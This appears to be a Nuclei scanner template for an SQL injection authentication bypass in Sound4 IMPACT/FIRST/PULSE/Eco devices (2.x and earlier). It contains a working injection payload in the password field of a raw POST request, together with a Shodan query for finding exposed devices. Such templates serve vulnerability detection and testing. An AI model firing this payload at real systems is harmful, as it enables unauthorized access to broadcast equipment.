36 lines
1.2 KiB
YAML
36 lines
1.2 KiB
YAML
|
id: sound4-password-auth-bypass
|
||
|
|
||
|
info:
|
||
|
name: Sound4 IMPACT/FIRST/PULSE/Eco <=2.x - Authentication Bypass
|
||
|
author: r3Y3r53
|
||
|
severity: high
|
||
|
description: |
|
||
|
The application suffers from an SQL Injection vulnerability. Input passed through the 'password' POST parameter in 'index.php' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication mechanism.
|
||
|
reference:
|
||
|
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5727.php
|
||
|
metadata:
|
||
|
max-request: 1
|
||
|
verified: true
|
||
|
shodan-query: http.html:"SOUND4"
|
||
|
tags: sound4,auth-bypass,sqli,misconfig
|
||
|
|
||
|
http:
|
||
|
- raw:
|
||
|
- |
|
||
|
POST /index.php HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
Content-Type: application/x-www-form-urlencoded
|
||
|
|
||
|
username=test&password=%27%2Bjoxy--%2Bz
|
||
|
|
||
|
host-redirects: true
|
||
|
max-redirects: 2
|
||
|
cookie-reuse: true
|
||
|
matchers:
|
||
|
- type: dsl
|
||
|
dsl:
|
||
|
- 'contains(body, "SOUND4 PULSE", "Network Diagnostic", "Disconnect")'
|
||
|
- 'contains(content_type, "text/html")'
|
||
|
- 'status_code == 200'
|
||
|
condition: and
|